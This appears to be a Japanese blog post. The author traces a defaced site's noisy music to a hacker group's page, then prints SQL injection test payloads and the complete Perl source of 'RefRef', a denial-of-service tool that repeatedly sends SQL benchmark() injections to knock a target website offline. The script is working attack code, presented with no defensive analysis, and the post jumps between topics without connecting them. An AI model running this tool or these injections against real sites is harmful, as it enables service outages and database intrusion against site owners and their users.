このサイト、死にそうな人の画像とうるさい音楽が流れていたため、この音楽の発生元を調べてみました。
BINGO→http://xdieka-civilx.xp3.biz/swf/xxx.swf (五月蠅いので要注意)
では、このTopページを 調べてみると
なんと、アラブ系のハッカーサイトでした。ww
GembalaMalam に侵入されたサイト一覧(Googleのキャッシュデータより)
team.php?idteam=1+and+1=1--+ #true |
team.php?idteam=1+and+1=2--+ #false |
#!usr/bin/perl
#RefRef © Anonymous 2011
use LWP::UserAgent;
my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);
head();
if($ARGV[0]) {
now($ARGV[0]);
} else {
sintax();
}
copyright();
sub now {
print "\n[+] Target : ".$_[0]."\n";
print "\n[+] Starting the attack\n[+] Info : control+c for stop attack\n\n";
while(true) {
$SIG{INT} = \&adios;
$code = toma($_[0]." and (select+benchmark(99,0x70726f62616e646f70726f62616e646f70726f62616e646f))");
unless($code->is_success) {
print "[+] Web Off\n";
copyright();
}}}
sub adios {
print "\n[+] Stoping attack\n";
copyright();
}
sub head {
print "\n\n-- == #RefRef == --\n\n";
}
sub copyright {
print "\n\n-- == RefRef == --\n\n";
exit(1);
}
sub sintax {
print "\n[+] Sintax : $0 \n";
}
sub toma {
return $nave->get($_[0]);
}